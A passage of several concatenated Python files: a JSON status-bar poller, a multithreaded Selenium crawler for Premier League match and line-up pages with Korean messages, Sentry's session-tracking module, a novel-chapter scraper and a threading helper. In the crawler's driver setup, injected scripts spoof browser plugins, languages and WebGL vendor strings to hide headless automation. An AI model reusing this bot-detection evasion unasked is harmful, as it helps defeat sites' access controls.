if self._error is not None:
return ["critical"]
elif self._data["state.open"]:
return ["warning"]
else:
return []
except KeyError:
return ["critical"]
def update(self, widgets):
if self._threadingCount == 0:
thread = threading.Thread(target=self.get_api_async, args=())
thread.start()
self._threadingCount = (
0 if self._threadingCount > 300 else self._threadingCount + 1
)
def getState(self, widget):
text = self._format
if self._error is not None:
text = self._error
else:
try:
text = formatStringBuilder(self._format, self._data)
except KeyError:
text = "KeyError"
return text
def get_api_async(self):
try:
with requests.get(self._url, timeout=10) as request:
# Can't implement error handling for python2.7 if I use
# request.json() as it uses simplejson in newer versions
self._data = self.__flatten(json.loads(request.text))
self._error = None
except requests.exceptions.Timeout:
self._error = "Timeout"
except requests.exceptions.HTTPError:
self._error = "HTTP Error"
except ValueError:
self._error = "Not a JSON response"
# left_mouse_button handler
def __forceReload(self, event):
self._threadingCount += 300
self._error = "RELOADING"
# Flattens the JSON structure recursively, e.g. ["space"]["open"]
# becomes ["space.open"]
def __flatten(self, json):
out = {}
for key in json:
value = json[key]
if type(value) is dict:
flattened_key = self.__flatten(value)
for fk in flattened_key:
out[key + "." + fk] = flattened_key[fk]
else:
out[key] = value
return out
# Author: Tobias Manske <tobias@chaoswg.xyz>
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
crawler.py
|
from bs4 import BeautifulSoup
import warnings; warnings.filterwarnings("ignore")
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from IPython.display import clear_output
import re, os, time, pickle, errno
import pandas as pd
import numpy as np
import threading
class BigwingCrawler():
def __init__(self, url='about:blank', page_range=None, page_type=None, browser='Chrome', headless=True, n_jobs=1, verbose=True):
'''
Crawler class constructor.
:param url: target URL
:param browser: headless browser to use, Chrome (default) or PhantomJS
:param headless: headless mode, True (default) or False
'''
try :
self.url = url
self.page_type = page_type
self.browser = browser
self.headless = headless
self.n_jobs = n_jobs
self.data = None
self.thread = []
self.verbose = verbose
if page_range != None:
self.partitioner(page_range[0], page_range[1], n_jobs)
self.start_page = page_range[0]
self.end_page = page_range[1]
self.error_page_list = self.load("error_pages")
self.success_page_list = self.load("success_pages")
except Exception as e:
print(e)
self.close()
def partitioner(self, start, end, divide):
partition_sp = np.linspace(start - 1, end, divide + 1).astype(int)
# Create per-partition storage
self.partitions = {} # scraped data per partition
self.error_pages = {} # error pages per partition
self.success_pages = {} # successful pages per partition
self.status = {} # progress status per partition
self.successes = {} # success count per partition
self.processeds = {} # processed count per partition
self.errors = {} # error count per partition
self.run_flags = {} # run flag per partition
self.stop_flags = {} # stop flag per partition
self.zip_flag = 0 # whether partitions have been merged
self.drivers = {} # browser driver per partition
self.htmls = {} # html document per partition
self.soups = {} # BeautifulSoup object per partition
self.processes = {} # worker thread per partition
# Initialise each partition's storage
for i in range(len(partition_sp) - 1):
# Build the partition key (the key encodes the partition's page range)
partition_key = (partition_sp[i] + 1, partition_sp[i + 1])
self.open(partition_key) # open a browser for this partition
self.partitions[partition_key] = pd.DataFrame()
self.error_pages[partition_key] = []
self.success_pages[partition_key] = []
self.status[partition_key] = "준비완료"
self.successes[partition_key] = 0
self.processeds[partition_key] = 0
self.errors[partition_key] = 0
self.processes[partition_key] = None
self.run_flags[partition_key] = False
self.stop_flags[partition_key] = True
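# Illustrative note (not part of the original source): np.linspace(start - 1,
# end, divide + 1) produces the partition boundaries. For pages 1..100 split
# across 4 workers:
#
#     np.linspace(0, 100, 5).astype(int)   # -> [0, 25, 50, 75, 100]
#     # partition keys: (1, 25), (26, 50), (51, 75), (76, 100)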
def start(self):
if self.verbose == True: print("{} 개 프로세스로 작동합니다.".format(len(self.partitions.keys())))
for partition_key in self.partitions:
self.status[partition_key] = "진행중"
self.processes[partition_key] = threading.Thread(target=self.crawl, args=(partition_key,))
self.run_flags[partition_key] = True
self.stop_flags[partition_key] = False
for process in self.processes.values() :
process.start()
# for process in self.processes.values() :
# process.join()
def restart(self, part_nm=None):
keys = list(self.partitions.keys())
if part_nm != None :
if part_nm > len(keys) : print("{}번 프로세스는 없습니다.".format(part_nm)); return;
partition_key = keys[part_nm - 1]  # part_nm is treated as 1-based
self.run_flags[partition_key] = True
self.status[partition_key] = "진행중"
print("{} 프로세스 재시작".format(partition_key))
else :
for partition_key in keys :
self.run_flags[partition_key] = True
self.status[partition_key] = "진행중"
print("{} 프로세스 재시작".format(partition_key))
def pause(self, part_nm=None):
keys = list(self.partitions.keys())
if part_nm != None :
if part_nm > len(keys) : print("{}번 프로세스는 없습니다.".format(part_nm)); return;
partition_key = keys[part_nm - 1]  # part_nm is treated as 1-based
self.run_flags[partition_key] = False
self.status[partition_key] = "일시정지"
print("{} 프로세스 일시정지".format(partition_key))
else :
for partition_key in keys :
self.run_flags[partition_key] = False
self.status[partition_key] = "일시정지"
print("{} 프로세스 일시정지".format(partition_key))
def stop(self, part_nm=None):
keys = list(self.partitions.keys())
if part_nm != None:
if part_nm > len(keys): print("{}번 프로세스는 없습니다.".format(part_nm)); return;
partition_key = keys[part_nm - 1]  # part_nm is treated as 1-based
self.stop_flags[partition_key] = True
self.status[partition_key] = "중단"
print("{} 프로세스 중단".format(partition_key))
else:
for partition_key in keys:
self.stop_flags[partition_key] = True
self.status[partition_key] = "중단"
print("{} 프로세스 중단".format(partition_key))
time.sleep(2)
self.close()
def set_verbose(self, verbose):
self.verbose = verbose
def open(self, partition_key):
self.drivers[partition_key] = self.set_driver(self.url)
self.htmls[partition_key] = self.set_html(partition_key)
self.soups[partition_key] = self.set_soup(partition_key)
print("{} 페이지 브라우저를 오픈했습니다.".format(partition_key))
def clear(self):
import shutil
try :
shutil.rmtree("tmpdata/{}".format(self.page_type))
print("데이터 삭제")
except FileNotFoundError as e :
print("기록이 없습니다.")
def backup(self):
import shutil
from datetime import datetime
timestamp = datetime.strftime(datetime.now(), "%m%d_%H%M")
tmpdir = os.path.join(os.path.abspath(os.path.curdir), "tmpdata")
backupdir = os.path.join(os.path.abspath(os.path.curdir), "backup")
dstdir = os.path.join(backupdir, timestamp)
if not os.path.isdir(backupdir):
os.makedirs(backupdir)
try :
shutil.move(tmpdir, dstdir)
print("{} 로 데이터를 백업했습니다.".format(
os.path.join(dstdir, self.page_type)))
except :
pass
def refresh(self, partition_key):
for i in range(self.n_jobs) :
self.htmls[partition_key] = self.set_html(partition_key)
self.soups[partition_key] = self.set_soup(partition_key)
def picker(self, partition_key, parent_tag, child_tag=None):
'''
Select the tags that hold the target information and collect them from the whole page.
:param parent_tag: parent tag selector
:param child_tag: child tag selector (Default : None)
:return: list of lists (one list of cell texts per matching parent tag)
'''
tags = self.soups[partition_key].select(parent_tag)
results = []
for tag in tags :
if child_tag != None :
tag = tag.select(child_tag)
tag = [data.text.strip() for data in tag]
if tag == [] :
continue
results.append(tag)
return results
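# Illustrative sketch (not part of the original source) of what picker()
# returns for a simple table; each parent tag with matching children becomes
# one list of stripped cell texts.
#
#     html = "<table><tr><td>10</td><td>Shots</td><td>7</td></tr></table>"
#     # With self.soups[partition_key] built from this html,
#     # picker(partition_key, "tr", "td") would yield [["10", "Shots", "7"]].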
def fetch(self, partition_key, keyword):
'''
Abstract method: crawl a single record.
:param keyword: search keyword
:return: None
'''
pass
def insert(self, input_data, col):
pass
def takeout(self):
'''
Return the crawled dataset.
:return: data (a DataFrame, or a dict of DataFrames keyed by partition)
'''
if self.n_jobs == 1:
# dict.pop() needs a key; with a single partition, return its DataFrame directly.
return next(iter(self.partitions.values()))
else:
if self.zip_flag == 0:
return self.partitions
else:
return self.data
def save(self):
self.data = pd.DataFrame()
for partition in self.partitions.values():
self.data = self.data.append(partition)
self.data = self.data.reset_index(drop=True)
print("데이터 병합")
self.record()
print("스크랩 로그기록")
self.log()
self.zip_flag = 1
def monitor(self, second=2):
self.set_verbose(False)
while True:
try:
self.summary()
clear_output(wait=True)
time.sleep(second)
except KeyboardInterrupt:
break;
self.set_verbose(True)
print("모니터링 종료")
def summary(self):
print("-" * 108)
for partition_key in self.partitions:
line = "{:>15} 스크랩프로세스 | {:>5}% {} | 총 {:>6}건 | 성공 {:>6}건 | 실패 {:>6}건".format(
str(partition_key),
("%.1f" % (self.processeds[partition_key] / (partition_key[1] - partition_key[0] + 1) * 100)),
self.status[partition_key],
partition_key[1] - partition_key[0] + 1,
self.successes[partition_key],
self.errors[partition_key],
)
print("|{:>82} |".format(line))
print("-" * 108)
total_processeds = 0
for i in self.processeds.values() : total_processeds += i
total_successes = 0
for i in self.successes.values(): total_successes += i
total_errors = 0
for i in self.errors.values(): total_errors += i
total_status = "준비완료"
for status in self.status.values() :
if "진행중" in status : total_status = "진행중"
cnt = 0
for status in self.status.values() :
if "종료" in status : cnt +=1
if cnt == len(self.status.values()) :
total_status = "종료"
percentage = (total_processeds / (self.end_page - self.start_page + 1)) * 100
line = "{:>12} 스크랩프로세스 | {:>5}% {} | 총 {:>6}건 | 성공 {:>6}건 | 실패 {:>6}건".format(
"전체",
"%.1f" % percentage,
total_status,
self.end_page - self.start_page + 1,
total_successes,
total_errors,
)
print("|{:>80} |".format(line))
print("-" * 108)
def record(self):
filename = "total_{}_{}_{}".format(self.page_type, self.start_page, self.end_page)
try:
if not (os.path.isdir(os.path.join("tmpdata", self.page_type))):
os.makedirs(os.path.join("tmpdata", self.page_type))
if not (os.path.isdir(os.path.join("tmpdata", self.page_type, "data"))):
os.makedirs(os.path.join("tmpdata", self.page_type, "data"))
except OSError as e:
if e.errno != errno.EEXIST:
print("디렉토리 생성 실패.")
raise
try :
with open("tmpdata/{}/data/{}.pkl".format(self.page_type, filename), "rb") as f:
dump_data = pickle.load(f)
except:
dump_data = pd.DataFrame()
dump_data = dump_data.append(self.data).reset_index(drop=True)
with open("tmpdata/{}/data/{}.pkl".format(self.page_type, filename), "wb") as f:
pickle.dump(dump_data, f)
# Merge with existing data
try :
file_data = pd.read_csv("tmpdata/{}/data/{}.csv".format(self.page_type, filename), encoding="utf8", index_col=False)
except FileNotFoundError :
file_data = pd.DataFrame()
file_data = file_data.append(self.data).reset_index(drop=True)
file_data.to_csv("tmpdata/{}/data/{}.csv".format(self.page_type, filename), encoding="utf8", index=False)
print("{} 로 데이터를 저장했습니다.".format(os.path.join(os.path.abspath(os.path.curdir),"tmpdata",self.page_type, "data", filename + ".csv")))
def load(self, filename):
import pickle
try :
with open("tmpdata/{}/log/{}.pkl".format(self.page_type, filename), "rb") as f:
data = pickle.load(f)
return data
except :
return []
def crawl(self, partition_key):
pass
def scrap(self, partition_key):
pass
def set_page(self, partition_key, page_nm):
pass
def _check(self, attr) :
'''
Check that a class attribute exists (for internal use).
:param attr: attribute name
:return: None
'''
try:
getattr(self, attr)
except AttributeError:
raise RuntimeError("FAILED : {} 를 확인해주세요.".format(attr))
def set_soup(self, partition_key):
'''
Build the BeautifulSoup object for a partition's html.
:param partition_key: partition whose html should be parsed
:return: BeautifulSoup object
'''
return BeautifulSoup(self.htmls[partition_key], 'html.parser')
def set_html(self, partition_key):
'''
Fetch the current page source (html string) for a partition.
:param partition_key: partition whose driver should be read
:return: html source string
'''
return self.drivers[partition_key].page_source
def set_driver(self, url):
'''
Create and configure a selenium browser driver.
:param url: URL string to load once the driver has started
:return: the configured webdriver (Chrome by default, PhantomJS otherwise)
'''
driver = None
option = Options()
option.add_argument('headless')
option.add_argument('window-size=1920x1080')
option.add_argument("disable-gpu")
# Hide the fact that we are running headless (1)
option.add_argument(
"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36")
option.add_argument("lang=ko_KR")
cur_dir = os.path.abspath(os.path.dirname(__file__))
browser_dir = os.path.join(cur_dir, "browser")
if self.browser == "Chrome":
browser_file = browser_dir + "/chromedriver.exe"
if self.headless == True :
driver = webdriver.Chrome(browser_file, chrome_options=option)
else :
driver = webdriver.Chrome(browser_file)
driver.get('about:blank')
driver.execute_script("Object.defineProperty(navigator, 'plugins', {get: function() {return[1, 2, 3, 4, 5]}})")
driver.execute_script("const getParameter = WebGLRenderingContext.getParameter;WebGLRenderingContext.prototype.getParameter = function(parameter) {if (parameter === 37445) {return 'NVIDIA Corporation'} if (parameter === 37446) {return 'NVIDIA GeForce GTX 980 Ti OpenGL Engine';}return getParameter(parameter);};")
else:
browser_file = browser_dir + "/PhantomJS.exe"
driver = webdriver.PhantomJS(browser_file)
driver.execute_script("Object.defineProperty(navigator, 'languages', {get: function() {return ['ko-KR', 'ko']}})")
driver.implicitly_wait(3)
driver.get(url)
return driver
def get_text(self, partition_key):
'''
Extract the text content from the partition's html.
:return: text string
'''
text = ""
p = re.compile(r'(<.{1,5}/?>)(?P<content>[^<\n]+)(</.{1,5}>)', re.M)
m = p.finditer(self.htmls[partition_key])
lines = [line.group("content").strip() for line in m]
for line in lines :
text = text + "\n" + line
return text
def get_tags(self, partition_key):
'''
Return the tag names used in the partition's html.
:return: list of strings
'''
alltags = self.soups[partition_key].find_all(True)
alltags = [tag.name for tag in alltags]
alltags = list(set(alltags))
return alltags
def get_attrs(self, partition_key):
'''
Return the attribute names used in the partition's html.
:return: list of strings
'''
tags = self.soups[partition_key].find_all(True)
attrs_list = [[attr for attr in tag.attrs.keys()] for tag in tags]
attrs = []
for attr in attrs_list:
attrs.extend(attr)
attrs = list(set(attrs))
return attrs
def log(self):
try:
if not (os.path.isdir(os.path.join("tmpdata", self.page_type))):
os.makedirs(os.path.join("tmpdata", self.page_type))
if not (os.path.isdir(os.path.join("tmpdata", self.page_type, "log"))):
os.makedirs(os.path.join("tmpdata", self.page_type, "log"))
except OSError as e:
if e.errno != errno.EEXIST:
print("디렉토리 생성 실패.")
raise
# Record error pages
error_page_list = []
for partition in self.error_pages.values() :
error_page_list.extend(partition)
pd.DataFrame(error_page_list).to_csv("tmpdata/{}/log/{}_pages.csv".format(self.page_type, "error"), encoding="utf8")
with open("tmpdata/{}/log/{}_pages.pkl".format(self.page_type, "error"), "wb") as f:
pickle.dump(error_page_list, f)
print("{} 로 데이터를 저장했습니다.".format(
os.path.join(os.path.abspath(os.path.curdir), "tmpdata", self.page_type, "log", "error_pages.csv")))
# Record successful pages
success_page_list = []
for partition in self.success_pages.values():
success_page_list.extend(partition)
pd.DataFrame(success_page_list).to_csv("tmpdata/{}/log/{}_pages.csv".format(self.page_type, "success"), encoding="utf8")
with open("tmpdata/{}/log/{}_pages.pkl".format(self.page_type, "success"), "wb") as f:
pickle.dump(success_page_list, f)
print("{} 로 데이터를 저장했습니다.".format(
os.path.join(os.path.abspath(os.path.curdir), "tmpdata", self.page_type, "log", "success_pages.csv")))
def __del__(self) :
self.close()
print("크롤러 종료")
class EPLCrawler(BigwingCrawler):
def __init__(self, url='about:blank', page_range=None, page_type="Lineup", browser='Chrome', headless=True, n_jobs=1, verbose=True):
super().__init__(url, page_range, page_type, browser, headless, n_jobs, verbose)
if page_type=="Lineup" or page_type=="Matchs" :
self.url = "https://www.premierleague.com/match/"
else : pass;
time.sleep(2)
def crawl(self, partition_key):
# Set the page cursor
cur_page = first_page = partition_key[0]; last_page = partition_key[1]
error_flag = False
# Choose the dataset type
if self.page_type == "Lineup" : dataset = pd.DataFrame()
elif self.page_type == "Matchs" : dataset = pd.DataFrame()
else : pass
# Data scraping loop
while cur_page < (last_page + 1) :
if cur_page in self.success_page_list : # skip pages that were already crawled successfully
if cur_page < (last_page + 1) :
self.success_pages[partition_key].extend([cur_page])
self.processeds[partition_key] +=1
self.successes[partition_key] +=1
cur_page += 1
continue
else : break;
self.status[partition_key] = "{}번 스크랩중".format(cur_page)
while self.run_flags[partition_key] == False : time.sleep(0.5) # paused
if self.stop_flags[partition_key] == True : break; # stopped
try:
self.set_page(partition_key, cur_page)
# Scrape the page
if self.page_type == "Lineup": # line-up page crawler
data = self.scrap_lineup(partition_key)
elif self.page_type == "Matchs": # match page crawler
data = self.scrap_matchstats(partition_key)
else: pass;
data.insert(0, "Match_ID", cur_page) #페이지 넘버 스탬프
# 매치정보가 많이 부족할때 에러 체크
if data.shape[1] < 10 :
error_flag = True
if self.verbose == True: print("{}번 스크랩실패.".format(cur_page))
else:
error_flag = False
if self.verbose == True: print("{}번 스크랩성공.".format(cur_page))
# Append to the accumulated records
dataset = dataset.append(data).fillna("")
self.partitions[partition_key] = dataset.reset_index(drop=True)
except Exception as e:
if self.verbose == True : print("{} : {}번 스크랩실패".format(e, cur_page))
error_flag = True
# Record the scrape result for the current page
self.processeds[partition_key] += 1
if error_flag == False :
self.successes[partition_key] += 1 # record success count
self.success_pages[partition_key].extend([cur_page]) # record successful page
self.success_page_list.extend([cur_page])
else :
self.errors[partition_key] += 1 # record failure count
self.error_pages[partition_key].extend([cur_page]) # record error page
self.error_page_list.extend([cur_page])
cur_page += 1
#스크랩 상태 저장 & 리포트
if self.verbose == True: print("({}, {}) 프로세스 스크랩완료".format(first_page, last_page))
self.status[partition_key] = "완료" if self.stop_flags[partition_key] == True else "종료"
def close(self):
for partition_key in self.partitions:
try :
self.drivers[partition_key].close()
except : pass
try :
self.drivers[partition_key].quit()
except : pass
print("{} 브라우저를 종료했습니다.".format(partition_key))
def scrap_matchstats(self, partition_key):
# Basic match information
matchInfo = self.drivers[partition_key].find_element_by_class_name("matchInfo").text.split("\n")
# Club names
home_nm = self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/section/div[3]/div/div/div[1]/div[1]/a[2]/span[1]").text
away_nm = self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/section/div[3]/div/div/div[1]/div[3]/a[2]/span[1]").text
# Match score
score = self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/section/div[3]/div/div/div[1]/div[2]/div").text
dataset = self.picker(partition_key, "tr", "td")
cols = ["matchinfo_"+str(i+1) for i in range(len(matchInfo))] + ["home_team", "score", "away_team"] + ["home_" + data[1] for data in dataset] + ["away_" + data[1] for data in dataset]
vals = matchInfo + [home_nm, score, away_nm] + [data[0] for data in dataset] + [data[2] for data in dataset]
matchstats = pd.DataFrame(columns=cols)
matchstats.loc[0] = vals
return matchstats
def scrap_lineup(self, partition_key):
lineup = pd.DataFrame(
columns=["Team", "Number", "Name", "Goal", "Sub_On_Off", "Sub_Time", "Card", "Playing", "Position",
"Nationality"])
for team in range(2):
# Position list
position_list = [position.text for position in self.soups[partition_key].find_all("div", "matchLineupTeamContainer")[team].select("h3")]
groups = self.soups[partition_key].find_all("div", "matchLineupTeamContainer")[team].select("ul")
# For each group
for group_idx, group in enumerate(groups):
players = groups[group_idx].find_all("li", "player")
# For each player
for player in players:
player_info = []
team_nm = self.soups[partition_key].select("header.squadHeader > div.position")[team].find(text=True).strip()
player_info.append(team_nm) # team name
number = player.find("div", "number").get_text().replace("Shirt number ", "");
player_info.append(number) # shirt number
info_tag = player.select("div.info")
for tag in info_tag:
nametag = tag.select(".name")[0]
name = nametag.find(text=True).strip();
player_info.append(name) # player name
try: # goals
p = re.compile(r'icn ball')
m = p.findall(str(nametag))
player_info.append(len(m))
except:
player_info.append(0)
try: # substituted on/off
p = re.compile(r'sub-on|sub-off')
m = p.search(str(nametag))
if m.group(0) == "sub-on":
player_info.append("On")
elif m.group(0) == "sub-off":
player_info.append("Off")
except:
player_info.append("")
try: # substitution time
player_info.append(nametag.select("span.sub")[0].text)
except:
player_info.append("")
try: # card (yellow/red)
p = re.compile(r'yellow|red')
m = p.search(str(nametag))
if m.group(0) == "yellow":
player_info.append("Yellow")
elif m.group(0) == "red":
player_info.append("Red")
except:
player_info.append("")
try: # starter or substitute
player_info.append("starter" if position_list[group_idx] != "Substitutes" or group_idx >= 4 else "substitutes")
except:
player_info.append("substitutes")
try: # position
player_info.append(tag.select(".position")[0].text.strip())
except:
player_info.append(position_list[group_idx])
try: # nationality
player_info.append(tag.select(".nationality")[0].text.strip())
except:
player_info.append("")
lineup.loc[lineup.shape[0]] = player_info
# Match information
try:
matchinfo = [""] * 4
matchinfo_tmp = [info.text.replace("Att: ", "") for info in self.soups[partition_key].select("div.matchInfo > div")]
for idx, info in enumerate(matchinfo_tmp):
matchinfo[idx] = info
except :
matchinfo = [""] * 4
lineup.insert(0, "Match_Date", matchinfo[0])
lineup.insert(1, "Referee", matchinfo[1])
lineup.insert(2, "Stadium", matchinfo[2])
lineup.insert(3, "Attendence", matchinfo[3])
try:
score = self.soups[partition_key].select("div.score")[0].text
except:
score = ""
lineup.insert(4, "Score", score)
return lineup
def set_page(self, partition_key, page_nm) :
dst_url = self.url + str(page_nm)
self.drivers[partition_key].get(dst_url)
try:
if not (os.path.isdir(os.path.join("tmpdata", self.page_type))):
os.makedirs(os.path.join("tmpdata", self.page_type))
except OSError as e:
if e.errno != errno.EEXIST:
print("디렉토리 생성 실패.")
raise
time.sleep(0.3)
if self.page_type == "Lineup" :
if self.drivers[partition_key].find_element_by_class_name("matchCentreSquadLabelContainer").text.strip() == 'Line-ups' :
self.drivers[partition_key].find_element_by_class_name("matchCentreSquadLabelContainer").click()
else : raise NameError('NoLineups')
elif self.page_type == "Matchs" :
self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/div[2]/div[1]/div/div/ul/li[3]").click()
time.sleep(0.2)
self.refresh(partition_key)
|
sessions.py
|
import os
import uuid
import time
from datetime import datetime
from threading import Thread, Lock
from contextlib import contextmanager
from sentry_sdk._types import MYPY
from sentry_sdk.utils import format_timestamp
if MYPY:
import sentry_sdk
from typing import Optional
from typing import Union
from typing import Any
from typing import Dict
from typing import Generator
from sentry_sdk._types import SessionStatus
def is_auto_session_tracking_enabled(hub=None):
# type: (Optional[sentry_sdk.Hub]) -> bool
"""Utility function to find out if session tracking is enabled."""
if hub is None:
hub = sentry_sdk.Hub.current
should_track = hub.scope._force_auto_session_tracking
if should_track is None:
exp = hub.client.options["_experiments"] if hub.client else {}
should_track = exp.get("auto_session_tracking")
return should_track
@contextmanager
def auto_session_tracking(hub=None):
# type: (Optional[sentry_sdk.Hub]) -> Generator[None, None, None]
"""Starts and stops a session automatically around a block."""
if hub is None:
hub = sentry_sdk.Hub.current
should_track = is_auto_session_tracking_enabled(hub)
if should_track:
hub.start_session()
try:
yield
finally:
if should_track:
hub.end_session()
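# Hedged usage sketch (not part of the original module): wrapping a block of
# work so a session is started and ended automatically when the experimental
# "auto_session_tracking" option is enabled. `handle_request` is a
# hypothetical callable and the DSN is a placeholder.
#
#     import sentry_sdk
#     from sentry_sdk.sessions import auto_session_tracking
#
#     sentry_sdk.init(dsn="...", _experiments={"auto_session_tracking": True})
#     with auto_session_tracking():
#         handle_request()  # errors captured here count towards the session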
def _make_uuid(
val, # type: Union[str, uuid.UUID]
):
# type: (...) -> uuid.UUID
if isinstance(val, uuid.UUID):
return val
return uuid.UUID(val)
TERMINAL_SESSION_STATES = ("exited", "abnormal", "crashed")
class SessionFlusher(object):
def __init__(
self,
flush_func, # type: Any
flush_interval=10, # type: int
):
# type: (...) -> None
self.flush_func = flush_func
self.flush_interval = flush_interval
self.pending = {} # type: Dict[str, Any]
self._thread = None # type: Optional[Thread]
self._thread_lock = Lock()
self._thread_for_pid = None # type: Optional[int]
self._running = True
def flush(self):
# type: (...) -> None
pending = self.pending
self.pending = {}
self.flush_func(list(pending.values()))
def _ensure_running(self):
# type: (...) -> None
if self._thread_for_pid == os.getpid() and self._thread is not None:
return None
with self._thread_lock:
if self._thread_for_pid == os.getpid() and self._thread is not None:
return None
def _thread():
# type: (...) -> None
while self._running:
time.sleep(self.flush_interval)
if self.pending and self._running:
self.flush()
thread = Thread(target=_thread)
thread.daemon = True
thread.start()
self._thread = thread
self._thread_for_pid = os.getpid()
return None
def add_session(
self, session # type: Session
):
# type: (...) -> None
self.pending[session.sid.hex] = session.to_json()
self._ensure_running()
def kill(self):
# type: (...) -> None
self._running = False
def __del__(self):
# type: (...) -> None
self.kill()
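# Hedged sketch (not part of the original module): a SessionFlusher batches
# pending sessions and hands them to a user-supplied callable every
# `flush_interval` seconds. `send_sessions` is a hypothetical transport hook.
#
#     def send_sessions(payloads):
#         print("flushing %d session(s)" % len(payloads))
#
#     flusher = SessionFlusher(send_sessions, flush_interval=10)
#     flusher.add_session(Session(release="my-app@1.0.0"))
#     # ... later, on shutdown:
#     flusher.kill()  # stop the background flush thread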
class Session(object):
def __init__(
self,
sid=None, # type: Optional[Union[str, uuid.UUID]]
did=None, # type: Optional[str]
timestamp=None, # type: Optional[datetime]
started=None, # type: Optional[datetime]
duration=None, # type: Optional[float]
status=None, # type: Optional[SessionStatus]
release=None, # type: Optional[str]
environment=None, # type: Optional[str]
user_agent=None, # type: Optional[str]
ip_address=None, # type: Optional[str]
errors=None, # type: Optional[int]
user=None, # type: Optional[Any]
):
# type: (...) -> None
if sid is None:
sid = uuid.uuid4()
if started is None:
started = datetime.utcnow()
if status is None:
status = "ok"
self.status = status
self.did = None # type: Optional[str]
self.started = started
self.release = None # type: Optional[str]
self.environment = None # type: Optional[str]
self.duration = None # type: Optional[float]
self.user_agent = None # type: Optional[str]
self.ip_address = None # type: Optional[str]
self.errors = 0
self.update(
sid=sid,
did=did,
timestamp=timestamp,
duration=duration,
release=release,
environment=environment,
user_agent=user_agent,
ip_address=ip_address,
errors=errors,
user=user,
)
def update(
self,
sid=None, # type: Optional[Union[str, uuid.UUID]]
did=None, # type: Optional[str]
timestamp=None, # type: Optional[datetime]
started=None, # type: Optional[datetime]
duration=None, # type: Optional[float]
status=None, # type: Optional[SessionStatus]
release=None, # type: Optional[str]
environment=None, # type: Optional[str]
user_agent=None, # type: Optional[str]
ip_address=None, # type: Optional[str]
errors=None, # type: Optional[int]
user=None, # type: Optional[Any]
):
# type: (...) -> None
# If a user is supplied we pull some data from it
if user:
if ip_address is None:
ip_address = user.get("ip_address")
if did is None:
did = user.get("id") or user.get("email") or user.get("username")
if sid is not None:
self.sid = _make_uuid(sid)
if did is not None:
self.did = str(did)
if timestamp is None:
timestamp = datetime.utcnow()
self.timestamp = timestamp
if started is not None:
self.started = started
if duration is not None:
self.duration = duration
if release is not None:
self.release = release
if environment is not None:
self.environment = environment
if ip_address is not None:
self.ip_address = ip_address
if user_agent is not None:
self.user_agent = user_agent
if errors is not None:
self.errors = errors
if status is not None:
self.status = status
def close(
self, status=None # type: Optional[SessionStatus]
):
# type: (...) -> Any
if status is None and self.status == "ok":
status = "exited"
if status is not None:
self.update(status=status)
def to_json(self):
# type: (...) -> Any
rv = {
"sid": str(self.sid),
"init": True,
"started": format_timestamp(self.started),
"timestamp": format_timestamp(self.timestamp),
"status": self.status,
} # type: Dict[str, Any]
if self.errors:
rv["errors"] = self.errors
if self.did is not None:
rv["did"] = self.did
if self.duration is not None:
rv["duration"] = self.duration
attrs = {}
if self.release is not None:
attrs["release"] = self.release
if self.environment is not None:
attrs["environment"] = self.environment
if self.ip_address is not None:
attrs["ip_address"] = self.ip_address
if self.user_agent is not None:
attrs["user_agent"] = self.user_agent
if attrs:
rv["attrs"] = attrs
return rv
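# Illustrative lifecycle (not part of the original module): create a session,
# record an error, close it and serialise it. The values shown are assumptions.
#
#     session = Session(release="my-app@1.0.0", environment="production")
#     session.update(errors=1)
#     session.close()            # status "ok" becomes "exited"
#     session.to_json()
#     # -> {"sid": ..., "init": True, "started": ..., "timestamp": ...,
#     #     "status": "exited", "errors": 1,
#     #     "attrs": {"release": "my-app@1.0.0", "environment": "production"}}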
|
day3homework_1.py
|
import requests
import re
import threading
def spider(listadd):
for j in listadd:
response = requests.get(j)
response.encoding = 'utf-8'
title = re.findall('<h1>\n(.*)</h1>', response.text, re.S)
content = re.findall('  (.*?)<br /><br />', response.text)
temp=title+content
temp_new=[]
for q in temp:
temp_new.append(q+'\r\n')
with open('/home/ubuntu/Desktop/out1/qqq'+j.split('/')[-1][0:7]+'.txt', 'w',) as f:
f.writelines(temp_new)
# print(title)
# print(content)
def part(url):
baseurl = 'http://www.17k.com'
res1 = re.compile('<dd>.*</dd>', re.S)
res2 = res1.findall(url)
res = re.findall('href="(.*.html)', res2[0])
ls = [baseurl+i for i in res]
ls1 = []
ls2 = []
flag = 1  # alternate chapter URLs between the two lists so two threads split the work
for i in ls:
if flag == 1:
ls1.append(i)
else:
ls2.append(i)
flag = -flag
# print(i)
thread_1 = threading.Thread(target=spider, args=(ls1,))
thread_2 = threading.Thread(target=spider, args=(ls2,))
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
def wenjian():
str1 = 'http://www.17k.com/list/2933095.html'
str2 = requests.get(str1)
str2.encoding = 'utf-8'
part(str2.text)
if __name__ == "__main__":
wenjian()
|
AsynchronousThreading.py
|
"""
"""
import threading
from src.utils.Prints import pt
import traceback
import json
def object_to_json(object, attributes_to_delete=None):
"""
Convert an object to a JSON string via its properties.
:param object: the instance to serialise
:param attributes_to_delete: set of attribute names to drop before serialising
:return: sorted, indented JSON string built from the object's properties.
"""
try:
object_dictionary = class_properties(object=object, attributes_to_delete=attributes_to_delete)
json_string = json.dumps(object, default=lambda m: object_dictionary, sort_keys=True, indent=4)
except Exception as e:
pt(e)
pt(traceback.print_exc())
raise ValueError("STOP")
return json_string
def execute_asynchronous_thread(functions, arguments=None, kwargs=None):
Thread(functions=functions, arguments=arguments, kwargs=kwargs)
class Thread():
"""
"""
def __init__(self, functions, arguments=None, kwargs=None):
datatype = self.__check_type__(functions)
if datatype == type(list()):
pass
else:
self._execute_process(function_def=functions, arguments=arguments, kwargs=kwargs)
def __check_type__(self, object):
return type(object)
def _execute_process(self, function_def, arguments=None, kwargs=None):
if not arguments:
arguments = ()
if type(function_def) == type(str("")):
name = function_def
else:
name = function_def.__name__
process = threading.Thread(name=name, target=function_def, args=arguments, kwargs=kwargs)
process.start()
def class_properties(object, attributes_to_delete=None):
"""
